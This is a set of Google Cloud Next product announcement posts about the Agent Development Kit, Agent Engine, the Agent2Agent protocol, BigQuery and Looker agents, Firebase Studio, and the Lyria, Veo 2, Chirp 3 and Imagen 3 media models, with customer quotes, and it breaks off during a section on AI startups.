Select your deployment target, be it local debugging or any containerized production deployment, such as Cloud Run, Kubernetes, or Vertex AI. ADK also supports Model Context Protocol (MCP), enabling secure connections between your data and agents.
Deploy to production using the direct integration to Vertex AI. This clear, reliable path from development to enterprise-grade deployment removes the typical overhead associated with moving agents to production.
While ADK works with your preferred tools, it’s optimized for Gemini and Vertex AI. For example, AI agents built with ADK using Gemini 2.5 Pro Experimental can break down complex problems through Gemini’s enhanced reasoning capabilities, and work with your preferred systems through its tool use capabilities. You can also deploy this agent to a fully-managed runtime and operate it at enterprise scale, using the native integration to Vertex AI from ADK.
ADK framework showing how you can build multi-agent systems
Hear how our customers are already using ADK:
“Using Agent Development Kit, Revionics is building a multi-agent system to help retailers set prices based on their business logic — such as staying competitive while maintaining margins — and accurately forecasting the impact of price changes. ADK streamlines multi-agent transfer and planning, such as knowing when to transfer between specialized agents (data retrieval) and tools (constraint application), thereby combining Revionics’ pricing AI with agentic AI to automate entire pricing workflows. Data is central to Revionics’ process, and the development kit enables agents to efficiently reason over big data through storage artifacts rather than relying solely on the LLM context.” – Aakriti Bhargava, VP of Product Engineering and AI at Revionics.
“We used the ADK to develop an agent that ensures we’re installing EV chargers where drivers need them most. The agent assists our data analysts to leverage geographical, zoning, and traffic data to inform and prioritize critical EV infrastructure investments that maximize driver convenience with less strain on our teams.” – Laurent Giraud, Chief Data (&AI) Officer, Renault Group.
“We’ve implemented the Agent Engine as the backbone of our video analysis AI agent, powered by Gemini. This setup allows us to leverage the Python Vertex AI SDK without worrying about infrastructure, saving us an estimated month of development time. Plus, the Agent Engine’s API seamlessly connects with other Google Cloud products like Workflows, giving us excellent maintainability and room to grow.” – Rina Tsuji, Senior Manager, Corporate Strategy, Nippon Television Holdings, Inc.
Introducing Agent Engine: Deploying AI agents with enterprise-grade controls
Agent Engine is our fully managed runtime that makes it easy to deploy AI agents to production. No more rebuilding your agent system when moving from prototype to production. Agent Engine handles agent context, infrastructure management, scaling complexities, security, evaluation, and monitoring. Agent Engine also integrates with ADK (or your preferred framework) for a frictionless develop-to-deploy experience. Together, you can:
Deploy agents built using any framework – whether you’re using ADK, LangGraph, Crew.ai, or others, and regardless of your chosen model (Gemini, Anthropic’s Claude, Mistral AI, or others). This flexibility is paired with enterprise-grade controls for governance and compliance.
Keep the context in your sessions: Rather than starting from a blank slate each time, the Agent Engine supports short-term memory and long-term memory. This way, you can manage your sessions and your agents can recall your past conversations and preferences.
Measure and improve agent quality with comprehensive evaluation tools from Vertex AI. Improve agent performance by using the Example Store or fine-tune models to refine your agents based on real-world usage.
Drive broader adoption by connecting to Agentspace: You can register your agents hosted on Agent Engine to Google Agentspace. This enterprise platform puts Gemini, Google-quality search, and powerful agents in the hands of employees while maintaining centralized governance and security.
Here’s how it all comes together:
Agent Engine connects across your enterprise for multi-agent systems
In the coming months, we will further expand Agent Engine capabilities with advanced tooling and testing. Your agents will have computer-use capabilities and will be able to execute code. Additionally, a dedicated simulation environment will let you rigorously test agents with diverse user personas and realistic tools to ensure reliability in production.
Introducing Agent2Agent protocol: Connecting agents across your enterprise ecosystem
One of the biggest challenges in enterprise AI adoption is getting agents built on different frameworks and vendors to work together. That’s why we partnered with many industry leaders who share our vision of multi-agent systems to create an open Agent2Agent (A2A) protocol.
Agent2Agent protocol enables agents across different ecosystems to communicate with each other, irrespective of the framework (ADK, LangGraph, Crew.ai, or others) or vendor they are built on. Using A2A, agents can publish their capabilities and negotiate how they will interact with users (via text, forms, or bidirectional audio/video) – all while working securely together.
As of today, 50+ partners such as Box, Deloitte, Elastic, PayPal, Salesforce, ServiceNow, UiPath, UKG, Weights & Biases, and many more are committed to working with us on the protocol. For details on the partners using the protocol, please refer to the blog here.
Defining interoperability together with our partners
Beyond working with other agents, your agents also need access to your enterprise truth – the ecosystem of information you have built across data sources, APIs, and business capabilities. You can equip agents with your existing enterprise truth data without building from scratch, using any approach you prefer:
ADK supports Model Context Protocol (MCP), so your agents connect to the vast and diverse data sources or capabilities you already rely on by leveraging the growing ecosystem of MCP-compatible tools.
From ADK, you can also connect your agents directly to your enterprise systems and capabilities. This includes 100+ pre-built connectors, workflows built with Application Integration, or data stored within your systems like AlloyDB, BigQuery, NetApp and much more. For example, you can build AI agents directly on your existing NetApp data, no data duplication required.
Using ADK, you can also seamlessly connect to your existing agents built in other frameworks like LangGraph or call tools from diverse sources including MCP, LangChain, CrewAI, Application Integration, and any OpenAPI endpoints.
In Apigee API management, we manage over 800K APIs that power your business, within and beyond Google Cloud. Using ADK, your agents can also tap into these existing API investments – no matter where they reside – with proper permissions.
Once connected, you can ground your AI responses with information like Google Search or specialized data from providers like Cotality, Dun & Bradstreet, HGInsights, S&P Global, and Zoominfo. For agents that rely on geospatial context, today we’re making it possible to ground your agents with Google Maps1. We make 100 million updates to Maps data every day, ensuring it is fresh and factual. And now, using Grounding with Google Maps, your agents can provide responses with geospatial information tied to millions of places in the U.S.
Enterprise grade security for your AI agents: Building agents your enterprise can trust
Beyond functionality, enterprise AI agents operating in production face security concerns like prompt injection attacks, unauthorized data access, and generating inappropriate content. Building with Gemini and Vertex AI in Google Cloud addresses these challenges in multiple layers. You can:
Control agent output using Gemini’s built-in safety features including configurable content filters and system instructions that define boundaries around prohibited topics and align with your brand voice.
Manage agent permissions through identity controls that let you determine whether agents operate with dedicated service accounts or on behalf of individual users, preventing privilege escalation and unauthorized access.
Protect sensitive data by confining agent activity within secure perimeters using Google Cloud’s VPC service controls, preventing data exfiltration and limiting potential impact radius.
Establish guardrails around your agents to control interactions at every step – from screening inputs before they reach models to validating parameters before tool execution. You can configure defensive boundaries that enforce policies like restricting database queries to specific tables or adding safety validators using lightweight models.
Auto-monitor agent behavior using comprehensive tracing capabilities that give you visibility into every action an agent takes, including its reasoning process, tool selection, and execution paths.
Get started building multi-agent systems
The real value of Vertex AI isn’t just the individual capabilities outlined above, but in how they work together as an integrated whole. What previously required piecing together fragmented solutions from multiple vendors now flows seamlessly through a single platform. This unified approach eliminates painful tradeoffs between models, integration with enterprise apps and data, or production readiness. The result isn’t just faster development – it’s more reliable agents ready for enterprise workflows. To get started today:
1. Grounding with Google Maps is currently available as an experimental release in the United States, providing access to only places data in the United States.
Today’s fast-paced environment demands more than just data access; it requires a real-time data activation flywheel. A new reality is emerging where AI, infused directly into the data landscape, works hand-in-hand with intelligent agents. These agents act as catalysts, unlocking insights for everyone, and enabling the autonomous, real-time action that’s critical for success. Google’s Data & AI Cloud is built to power this flywheel, bringing AI to data for continuous, real-time data activation — a focus that’s attracting 5x more organizations to BigQuery than the two leading cloud companies that exclusively offer data warehouse and data science platforms.
Radisson Hotel Group boosted campaign productivity by 50% and revenue by over 20% using Gemini model fine-tuning with BigQuery.
Gordon Food Service used BigQuery to unify 170+ data sources, creating a scalable modern data architecture and an AI-ready foundation. This improved real-time response to critical business needs, enabled comprehensive analytics, driving significant customer adoption increase for their ordering applications, providing timely insights to their employees, while reducing costs and gaining market share.
J.B. Hunt is transforming logistics for shippers and carriers by consolidating fragmented systems, including Databricks, onto a unified BigQuery platform.
General Mills saves over $100 million using BigQuery and Vertex AI by giving employees secure access to LLMs to answer questions based on structured and unstructured data.
“We didn’t just need a place to store or consume data, we wanted a collaborator that could help us scale the most advanced data management in the industry.” – Jaime Montemayor, Chief Digital & Technology Officer, General Mills
Today, we’re announcing several new innovations with our autonomous data to AI platform powered by BigQuery, alongside our unified, trusted, and conversational BI platform with Looker:
Specialized agents for every user: New assistive and agentic experiences, grounded in your trusted data and available in BigQuery and Looker, are set to simplify and accelerate the work of data engineers, data scientists, analysts and business users.
Accelerating data science and advanced analytics: We are enhancing data science workflows in BigQuery with new AI-assisted notebooks and unlocking new insights with our BigQuery AI Query Engine, alongside seamless integration with real-time and open-source technologies.
Autonomous data foundation: New autonomous capabilities in BigQuery capture, manage, and orchestrate all data types, including native support for unstructured data handling and open data formats like Iceberg.
Let’s take a deeper look at each of these developments.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb096f7d00>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>
1. Specialized agents for every user
We believe AI should be accessible to everyone. We have made AI driven assistive experiences broadly available in BigQuery and Looker, and now we have expanded to specialized agents that best meet the needs for all data roles, including:
Data engineering agentcapabilities, embedded in BigQuery pipelines (GA),deliver support to build data pipelines, perform data preparation (GA) like transformation and enrichment of data, maintain data quality with anomaly detection (preview), and automate metadata generation. Traditionally data engineers spend countless hours cleaning, transforming, and validating data — these agents replace tedious and time consuming tasks and enable trusted data, boosting productivity of your data teams.
Data science agent (GA), embedded within Google’s Colab notebook, enables every stage of model development. It automates feature engineering, provides intelligent model selection, enables scalable training, and faster iteration. This agent allows data science teams to focus on building advanced data science workflows, instead of wrestling with data and infrastructure.
Looker conversational analytics (preview) empowers every user to interact with data using natural language. Expanded capabilities developed in partnership with DeepMind, not only conducts advanced analysis but also explains its thinking transparently, empowering all users to understand the agent’s behavior and seamlessly resolve ambiguities. In addition, Looker’s semantic layer improves accuracy by as much as two thirds. As users reference business terms like ‘revenue’ or ‘segments,’ the agent knows exactly what you mean and can calculate metrics in real-time, ensuring it delivers accurate, relevant, and trusted results. Additionally, we are launching a conversational analytics API (preview) for developers to build and embed conversational analytics into applications and workflow.
Interact using natural language with Looker Conversational Analytics Agent
To power intelligence across assistive and agentic experiences in the BigQuery autonomous data to AI platform, we are also launching BigQuery knowledge engine (preview). It leverages the power of Gemini to analyze schema relationships, table descriptions, and query histories to generate metadata on the fly, model data relationships, and recommend business glossary terms. This knowledge engine is the foundation of AI powered experiences, including AI-powered data insights and semantic search (GA) across BigQuery, grounding AI and agents in business context.
Today all of our Gemini powered assistive and agentic experiences in BigQuery and Looker are available to all customers within the existing tiers of our pricing models — no add-ons!
2. Accelerating data science and advanced analytics
Our BigQuery autonomous data to AI platform is fundamentally changing how data scientists and analysts work, enabling new AI driven data science experiences and new engines to process complex data and support advanced analyses in real-time.
First, we’re supercharging the BigQuery notebook experience with AI. We are introducing intelligent SQL cells that understand your data’s context and provide smart suggestions as you write code and enable you to join data sources directly within your notebook. We are also adding native exploratory analysis and visualization capabilities, making it easy to explore data, as well as adding features to enable easier collaboration with colleagues. Data scientists can also schedule analyses to run and refresh insights periodically. And, to share insights more broadly across the organization, we are introducing the ability to build interactive data apps – dynamic, user-friendly interfaces powered by your notebook.
AI Powered Data Science Experience
Building on this enhanced notebook environment, we are also announcing BigQuery AI query engine to support advanced, AI-driven analytics. This engine enables data scientists to move beyond simply retrieving structured data to seamlessly processing both structured and unstructured data together with added real-world context. The BigQuery AI query engine co-processes traditional SQL alongside Gemini to inject runtime access to real-world knowledge, linguistic understanding, and reasoning abilities. A data scientist can now ask questions like: “Which products in our inventory are primarily manufactured in countries with emerging economies?” The foundation model inherently knows which countries are considered emerging economies. Analysts can ask: “Which products are included in these social media images?” and our new engine processes the unstructured images and matches them to your product catalog. This engine supports a broad range of use cases, including building richer features for models, performing nuanced segmentation, and uncovering insights previously out of reach.
Furthermore, we empower users with the best of the open-source ecosystem, enhanced for the cloud. Google Cloud for Apache Kafka (GA) facilitates real-time data pipelines for event sourcing, model scoring, messaging and real-time analytics, powering serverless execution of Apache Spark workloads within BigQuery(preview). Customer use of our serverless Spark capability has nearly doubled in the past year, and we have enhanced this engine to provide 2.7x faster processing than the prior year.
BigQuery allows data scientists to leverage the tools they need on Google’s serverless and scalable architecture, whether it’s SQL, Spark, or the semantic power of foundation models, enabling faster innovation without traditional infrastructure challenges.
“We see SQL and Spark as two complementary ways of accessing and transforming data. Spark is especially useful to us in use cases that require complex business logic, which although niche, are extremely business-critical. Having an unified platform for SQL, Spark and AI, with the development experience in notebooks will considerably simplify these critical use cases.” – Andrés Sopeña Pérez, Head of Data and AI, Trivago
3. An autonomous data foundation across the entire data lifecycle
Underpinning our specialized agents and advanced analytics engines is an autonomous data foundation designed for the complexity of modern data. We are fundamentally changing the landscape by making unstructured data a first-class citizen within BigQuery. This is achieved with new capabilities in the platform including autonomous and invisible governance, orchestration for diverse data workloads, and a commitment to flexibility via open formats, ensuring your data is always ready for any data science or AI challenge. And we do all of this while minimizing operational overhead and delivering optimal price performance.
The biggest untapped opportunity for many organizations lies in the potential of their unstructured data. While structured data has pathways to analysis, unique insights embedded in images, audio, video, and text are often hard to extract and underutilized, and typically reside in siloed systems. BigQuery directly tackles this challenge by making unstructured data a first-class citizen with multimodal tables (preview), allowing you to bring rich, complex data types alongside structured data for unified storage and querying. To effectively manage this comprehensive data estate, our enhanced BigQuery governance (preview) provides a single, unified view for data stewards and professionals to handle discovery, classification, curation, quality, usage, and sharing, including automated cataloging (GA) and metadata generation (experimental). Moreover, to ensure timely insights from all your data streams, BigQuery continuous queries (GA) enable instant analysis and action on streaming data using SQL, regardless of its original format.
Our advanced support of multimodal data, both structured and unstructured, is driving adoption – customer use of Google’s AI models in BigQuery for multimodal analysis has grown by 16x year over year. Our integrated approach to data and AI is also cost effective, together BigQuery and Vertex AI are between 8-16x more cost efficient when compared to other independent data warehouse and AI platforms.
Our commitment to an open ecosystem remains paramount. BigQuery tables for Apache Iceberg (preview), delivers the flexibility of an open data lakehouse alongside the performance and integrated tooling of BigQuery, allowing you to connect your Iceberg data to SQL, Spark, AI and third party engines in an open and interoperable manner. This offering provides adaptive and autonomous table management, delivers high-performance streaming, auto-AI generated insights, near infinite serverless scale, and advanced governance. Through integration with Cloud storage, our managed service provides centralized fine-grained access control management and fail-safe capabilities.
Finally, the autonomous data to AI platform is self-optimizing. It scales resources, manages workloads, and helps ensure their cost-effectiveness with advanced workload management capabilities (GA). Furthermore, we’ve simplified purchasing with the new BigQuery spend commit (GA), unifying spend across our BigQuery platform, providing flexibility to move spend across data processing engines, streaming, governance, and more.
Get started on your data and AI journey by taking advantage of our BigQuery data migration offer. We can’t wait to learn about the ways you are innovating using data.
Millions of developers use Firebase to engage their users, powering over 70 billion instances of apps every day, everywhere — from mobile devices and web browsers, to embedded platforms and agentic experiences. But full-stack development is evolving quickly, and the rise of generative AI has transformed not only how apps are built, but also what types of apps are possible. This drives greater complexity, and puts developers under immense pressure to keep up with many new technologies that they need to manually stitch together. Meanwhile, businesses of all sizes are seeking ways to make AI app development cycles more efficient, deliver quality software, and get to market faster.
Today at Google Cloud Next, we’re introducing a suite of new capabilities that transforms Firebase into an end-to-end platform to accelerate the complete application lifecycle. The new Firebase Studio, available to everyone in preview, is a cloud-based, agentic development environment powered by Gemini that includes everything developers need to create and publish production-quality AI apps quickly, all in one place. Several more updates across the Firebase platform are helping developers unleash their modern, data-driven apps on Google Cloud. These announcements will empower developers to forge new paths for building AI applications across multiple platforms.
Meet Firebase Studio
Over the past year, we launched many new services, including Gemini in Firebase, Genkit, and Project IDX (a fork of Code OSS), to make building AI apps faster and easier. We’re taking a significant step forward with the launch of Firebase Studio, which fuses all of these capabilities together with Firebase services and the creative power of Gemini into a new, natively agentic experience.
Firebase Studio helps you build full-stack AI apps
For new apps, choose from over 60 pre-built templates or get started with the App Prototyping agent. It assists you with designing your app — such as the UI, API schema, and AI flows — all using natural language, images, drawing tools, and screenshots. Keep prompting to iterate on your prototype, and when ready, deploy it directly to Firebase App Hosting. Share a URL to a fully functional version of your prototype to get feedback or run experiments. Monitor the usage and behavior at a glance or jump into the Firebase Console for more detailed monitoring. At any time, you can open your app inside a Firebase Studio coding workspacewith a single click and no additional setup. There, you can refine the architecture and expand features to prepare for production deployment.
Coding workspaces also enable you to:
Simplify coding workflows: Write code and test features, all with assistance from Gemini in Firebase at every step of the way. Complete a variety of tasks like debugging, testing, refactoring, explaining, and documenting code with ease.
Enhance existing apps: Import existing codebases from your local machine or git-based repositories, including GitHub, GitLab, and Bitbucket. Create custom templates for your preferred tech stacks to share across your team.
Create full-stack experiences: Customize and evolve all aspects of your apps, from AI model inference, agents, and retrieval augmented generation (RAG), to the user experience, business logic, database, and more. Easily expose and integrate tools such as APIs and microservices to your AI apps.
Work with familiar tools: Bring along your specific configurations, such as system tools, extensions, and environment variables to tailor your workspaces. Access thousands of extensions from the Open VSX Registry.
Flexible deployment options: Set up your app to run on the cloud with built-in integrations to Firebase backend services and Google Cloud Run. You can also deploy on your own custom infrastructure.
Firebase Studio is currently available with three workspaces at no cost during preview. Members of the Google Developer Program get up to 30 workspaces. Check out Firebase Studio today.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1e688d00>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Engage AI agents throughout your entire workflow
We’re also providing early access to Gemini Code Assist agents from within Firebase Studio. For example, you might invoke the Migration agent in Firebase Studio to help you migrate your code between versions of Java; the AI Testing agent to run adversarial tests against AI models to uncover and fix potentially harmful outputs; and the Code Documentation agent to chat with a wiki-style knowledge base about your code to ease the onboarding of new team members.
Firebase App Distribution is a unified mobile app testing service for running manual and automated tests. The new App Testing agent in Firebase App Distribution can simulate real-world user interactions with your app. For example, you can write a test that sets a goal to “Find a trip to Greece.” The App Testing Agent will use Gemini to formulate a plan to achieve that goal, and run it on virtual or physical devices, navigating your UI and producing detailed pass/fail results with intuitive rationales and visuals of the paths that the agent chose.The App Testing agent is available now in preview and you can try it out on your Android app today, with more platforms coming this year.
The new App Testing agent in Firebase App Distribution
Create new AI app experiences
A lack of best practices and standards create challenges when integrating cutting-edge AI features into your applications. That’s why we’re continuing to invest in robust frameworks, SDKs, and tooling to help streamline the development process, freeing you to focus on crafting truly engaging and innovative user interactions.
Expanded language support for Genkit Genkit helps reduce the complexity of building, testing, and monitoring your apps’ AI features. Develop powerful agentic experiences with support for structured output, tool calling, human-in-the-loop interactions, retrieval augmented generation (RAG), Model Context Protocol (MCP), and multi-model orchestration. Today, we’re making it easier to do that in your preferred language, by introducing early support for Python and expanded support for Go. Access Gemini models, Imagen 3, and additional models such as Llama and Mistral through Vertex Model Garden, plus self-hosted models with Ollama, and a growing ecosystem of third-party models using community plugins.
Try this template in Firebase Studio to build with Genkit.
Genkit helps you build AI-powered features
New models through Vertex AI in Firebase Vertex AI in Firebase lets developers integrate generative AI into their applications by providing a streamlined, secure SDK. It’s used by thousands of apps today, such as Meal Planner, a meal planning and shopping list management app; Life, an AI-powered diary assistant; HiiKER, an offline hiking maps provider; and Waveful, a social media app for creators. In March, we added support for Imagen 3 models (Imagen 3 and Imagen 3 Fast), in addition to the Gemini family of models, which lets you add image generation directly to your Android, iOS, Flutter, and Web applications. Today, we are adding support for the Gemini 2.0 Multimodal Live API, enabling more conversational interactions in apps, like allowing customers to ask audio questions and get responses.
The Gemini 2.0 Multimodal Live API used via Vertex AI in Firebase
Accelerate modern, data-driven apps
We’re also providing you with greater control of your app architecture and deployment processes with Firebase Data Connect and Firebase App Hosting, now generally available.
Build sophisticated apps with Firebase Data Connect Firebase Data Connectoffers the robust reliability of Google Cloud SQL for PostgreSQL with instant GraphQL APIs and type-safe SDKs. Build a wide range of experiences, like social media apps with complex user relationships, e-commerce platforms with large product catalogs, or personalized recommendations with built-in vector search.
Data Connect now helps you to:
Easily generate schemas and queries: Use Gemini in Firebase to automatically generate your Data Connect schemas, queries, mutations, and client SDKs, significantly speeding up backend development.
Leverage expanded query capabilities: Data Connect now has expanded query power with native aggregation support for deeper data insights, atomic data modifications, and transactions with server value expressions, helping to ensure data integrity across complex operations.
Build with web frameworks: Enjoy tight integration and streamlined data handling with generated type-safe hooks and components for web frameworks, enabling rapid development of dynamic, data-driven applications.
Firebase Data Connect in Firebase Studio
Deploy with Firebase App Hosting Firebase App Hosting is an opinionated, git-centric hosting solution for modern, full-stack web apps. App Hosting accelerates time-to-market by managing your app’s entire stack, from the build, to the CDN, to server-side rendering. You push to GitHub, and App Hosting figures out the rest. App Hosting is built on enterprise-grade Google Cloud services: Cloud Build, Cloud Run, Cloud CDN, and more.
With this release of App Hosting, you can:
Easily test and troubleshoot builds: App Hosting now has a local emulator, and improved error messages to help you get ahead of and troubleshoot build failures.
Recover from production incidents in seconds: Use App Hosting’s new monitoring dashboard to understand your app’s performance and health, and instantly roll back to a previous version if you spot a regression.
Connect to a Virtual Private Cloud (VPC): Give your app access to backend services in your Google Cloud project that are not accessible on a public IP address (e.g., caching content with Cloud Memorystore, or accessing data from non-Firebase databases).
New monitoring dashboard in Firebase App Hosting
Get ready to reimagine not just how you build your apps, but also what kinds of apps you can build! Learn more about these products and more on the Firebase blog. We can’t wait to see what you create with the Firebase platform.
Today, we’re continuing to invest in generative media by adding Lyria,Google’s text-to-music model, to Vertex AI in preview with allowlist.With the addition of music, Vertex AI is now the only platform with generative media models across all modalities – video, image, speech, and music. This means you can build a complete, production ready asset starting from a text prompt, to an image, to a complete video asset with music and speech.
In addition to Lyria, we’re launching new features and updates to improve our other generative media models:
New editing and camera control features for Veo 2, our advanced video generation model, are available in preview with allowlist to help our customers refine and repurpose video content with precision. This gives you creative control over your video, helping your teams iterate faster, produce higher-quality content, and reduce post-production time and costs.
Chirp 3, our groundbreaking audio generation and understanding model,now includes Instant Custom Voice, a new way to create custom voices with just 10 seconds of audio input. You can also weave AI-powered narration into your existing recordings, and add a speech transcription capability that can distinguish between speakers. Both features are available through a preview with allowlist.
Imagen 3, our highest quality text-to-image model, now has improved image generation and inpainting capabilities for reconstructing missing or damaged portions of an image. Our latest update significantly elevates the quality of object removal, delivering a more natural and seamless editing experience.
In alignment with our AI Principles, the development and deployment of Lyria, Veo 2, Chirp 3, and Imagen 3 on Vertex AI prioritizes safety and responsibility with built-in precautions like digital watermarking via SynthID, safety filters, and data governance. And, with our industry-first approach to indemnification, you can use content generated with a range of our products knowing Google will indemnify you for third-party IP claims, including copyright.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15aac3640>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Lyria: Text-to-music model now available on Vertex AI
Lyria produces high-fidelity audio, meticulously capturing subtle nuances and delivering rich, detailed compositions across a range of musical genres. Lyria on Vertex AI can help enterprises:
Elevate brand experiences: Quickly create soundtracks for marketing campaigns, product launches, or immersive in-store experiences, all tailored to your brand’s unique identity. Lyria enables you to create sonic branding that resonates deeply with your target audience, fostering emotional connections and enhancing brand recall.
Streamline content creation: For video production, podcasting, and digital content creation, finding the perfect royalty-free music can be a time-consuming and costly process. Lyria eliminates these hurdles, allowing you to generate custom music tracks in minutes, directly aligning with your content’s mood, pacing, and narrative. This can help accelerate production workflows and reduce licensing costs.
For example:
Craft a high-octane bebop tune. Prioritize dizzying saxophone and trumpet solos, trading complex phrases at lightning speed. The piano should provide percussive, chordal accompaniment, with walking bass and rapid-fire drums driving the frenetic energy. The tone should be exhilarating, and intense. Capture the feeling of a late-night, smoky jazz club, showcasing virtuosity and improvisation. The listener should not be able to sit still.
Expanding Veo 2 with a new robust set of editing features
Today, we’re announcing the preview of a robust feature set that helps you create videos, edit them, and add visual effects with Veo 2. These features help teams edit and repurpose video content to meet your evolving needs, transforming Veo on Vertex AI from a generation tool to a comprehensive video creation and editing platform. Now you can:
Refine and enhance existing footage with:
Inpainting: Get clean, professional edits without manual retouching. You can remove unwanted background images, logos, or distractions from your videos, making them disappear smoothly and perfectly in every single frame, so it looks like they were never there.
Clean, professional edits without manual retouching
Outpainting: Extend the frame of existing video footage, transforming traditional video into optimized formats for web and mobile platforms. This helps make it easy to adapt your content for various screen sizes and aspect ratios – for example, converting landscape video to portrait for social media shorts.
Outpainted video with an extended frame
Implement sophisticated cinematic techniques: New features include directing shot composition, camera angles, and pacing that help teams use sophisticated cinematic techniques with ease, without requiring complex prompting or specialized expertise. For example, you can use camera pre-sets to move the camera in different directions, create a timelapse effect, or generate a drone style shot.
New Veo 2 editing features for directing shot composition
Create a cohesive video by connecting two existing assets (interpolation): With interpolation, you can define the beginning and end of a video sequence, allowing Veo to seamlessly generate the connecting frames. This ensures smooth transitions and maintains visual continuity, creating a polished and professional final product.
Interpolation creates smooth transitions across frames
Chirp 3: Instant Custom Voice and Transcription updates
Last month, we integrated Chirp 3, our groundbreaking audio understanding and generation model, into Vertex AI. Chirp 3’s new HD voices feature offers natural and realistic speech in over 35 languages with eight speaker options.
Now, we’re announcing two new features:
Chirp 3: Instant Custom Voice is now generally available through an allowlist. Now, you can generate realistic custom voices from 10 seconds of audio input. This enables enterprises to personalize call centers, develop accessible content, and establish unique brand voices—all while maintaining a consistent brand identity. To ensure responsible use, Instant Custom Voice includes built-in safety features, and our allowlisting process involves rigorous diligence to verify proper voice usage permissions.
Chirp 3: Transcription with Diarization is now available in preview with allowlist. This powerful feature accurately separates and identifies individual speakers in multi-speaker recordings, significantly improving the clarity and usability of transcriptions for applications like meeting summaries, podcast analysis, and multi-party call recordings.
Imagen 3: Improvements to Imagen quality and editing
Over the last year we’ve made huge improvements to Imagen 3, our highest quality text-to-image model, capable of generating images with even better detail, richer lighting and fewer distracting artifacts than our previous models.
Imagen 3 Editingprovides a powerful and user-friendly way to refine and tailor any image. We’ve made significant improvements to Imagen 3 inpainting capabilities for reconstructing missing or damaged portions of an image. Our latest update significantly elevates the quality of object removal, delivering a more natural and seamless editing experience. Here is an example of how you can quickly remove unwanted objects, blemishes, or distractions from your photos.
Easy ways to tailor images, including removing unwanted objects
Build with enterprise safety and security
Designing and developing AI to be secure, safe, and responsible is paramount. Consistent with our AI Principles,Lyria, Veo 2, Chirp 3, and Imagen 3 on Vertex AI were built with safety at the core.
Digital watermarking: Google DeepMind’s SynthID embeds invisible watermarks into every image, video and audio frame that Imagen, Veo, and Lyria produce, helping decrease misinformation and misattribution concerns.
Safety filters: Veo, Imagen, Lyria, and Chirp all have built-in safeguards to help protect against the creation of harmful content and adhere to Google’s Responsible AI Principles. We will continue investing in new techniques to improve the safety and privacy protections of our models.
Data governance: We do not use customer data to train our models, in accordance with Google Cloud’s built-indata governance and privacy controls. Your customer data is only processed according to your instructions.
Copyright indemnity: Our indemnity for covered generative AI services offers peace of mind for copyright concerns.
Customers are delivering value with generative media models on Vertex AI
Generative AI is no longer a futuristic concept, but a powerful tool driving real-world business results. Companies like WPP, Agoda, Bending Spoons, Monks.Flow, The Brandtech Group, and Bloomberg Connects are using our generative media models in production. Let’s look at some concrete examples of how leading enterprises are leveraging Google Cloud’s generative media capabilities:
Goodby, Silverstein & Partners: In 1937, Salvador Dalí imagined “Giraffes on Horseback Salad” — a cinematic vision so surreal, so ahead of its time, that it proved impossible to produce. For almost a century, it lived only in sketches and notes. Now, with the power of Veo 2, Goodby Silverstein & Partners and The Dalí Museum have realized that vision — using tools finally capable of transforming surrealism into film.
“Dalí imagined a film so surreal, so untethered from convention, that it couldn’t exist in his lifetime. Now, thanks to the astonishing capabilities of Veo 2 and Imagen 3, we’ve been able to help bring that vision to life—not as a replica, but as a reawakening.It’s one of the most creatively thrilling things we’ve ever done.” – Jeff Goodby, Co-Chairman, Goodby Silverstein & Partners.
Giraffes on Horseback Salad, Inspired by Salvador Dalí’s Screenplay
L’Oreal Groupe:
L’Oreal Groupe is leveraging Veo and Imagen to transform the end-to-end production of high-quality video and image assets, helping foster greater creative exploration across their global marketing initiatives and upholding their commitment to trustworthy AI.
“By integrating Veo and Imagen into our creative process, we’re not just speeding up marketing content creation, we’re changing how we approach creativity. These models act as powerful creative partners, empowering our teams to experiment with new ideas and respond to the market. We’re expanding our qualitative video and image production across 20 additional countries and languages, all while upholding our trustworthy AI values.” – Thomas Ménard, Manager of AI Center Enablement, L’Oreal Groupe
Kraft Heinz:
Kraft Heinz’s Tastemaker platform empowers their teams with access to Veo 2 and Imagen 3, dramatically accelerating creative and campaign development processes.
“With Veo 2 on Vertex AI as part of our Tastemaker platform, Kraft Heinz has unlocked unprecedented speed and efficiency in our creative workflows. What once took us eight weeks is now only taking eight hours, resulting in substantial cost savings. Implementing Google Cloud AI within our platform that is deeply trained on our brand intelligence, allows innovation and creative teams to rapidly prototype, test, and deploy content, transforming how we bring our iconic brands to life.” – Justin Thomas, Head Digital Experience & Growth
By leveraging our cutting-edge AI models on Vertex AI, enterprises are achieving remarkable gains in efficiency, creativity, and customer engagement. This momentum is a testament to the power of our technology and its ability to help drive tangible business value.
Get started
Get started with Veo, Imagen, and Chirp on Vertex AI today. To get started with Lyria, reach out to your Google Cloud account representative.
AI research labs and model builders like Anthropic, Cohere, Magic, Mistral, and AI21 Labs are great examples. Anthropic has been using Google Cloud infrastructure to support model training and inference for several years. Google Cloud has also become an increasingly important route for organizations to access Anthropic’s models. In fact, more than 4,000 companies have started using Claude models via Vertex AI thus far.
This week at Google Cloud Next, we’re highlighting the progress that even more global startups are making toward building AI systems and applications that will create real value for people and businesses. We’ll share some of the new startups who have chosen Google Cloud as their key technology partner; new industry partnerships and resources to make it easier for early-stage startups to build and go to market on Google Cloud; new companies joining our global Accelerator programs; and more ways that startups are achieving success with Google Cloud.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee15d6e5d00>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Supporting more AI startups on Google Cloud
This week, we’re announcing an exciting group of startups who are launching new or expanded work with Google Cloud. These companies span a broad swath of use cases, products, and industries, including consumer apps used by millions of people, enterprise use cases like search and data analytics and storage, developer coding assistance, and solutions for unique vertical challenges. These include:
